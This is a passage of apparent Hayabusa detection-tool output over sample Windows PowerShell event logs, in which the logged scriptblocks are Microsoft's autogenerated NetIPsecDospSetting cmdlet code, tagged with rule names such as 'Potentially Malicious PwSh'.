'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value 
= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; 
ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) 
{ [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,Dscp} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = 
${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and 
(@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] 
${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, 
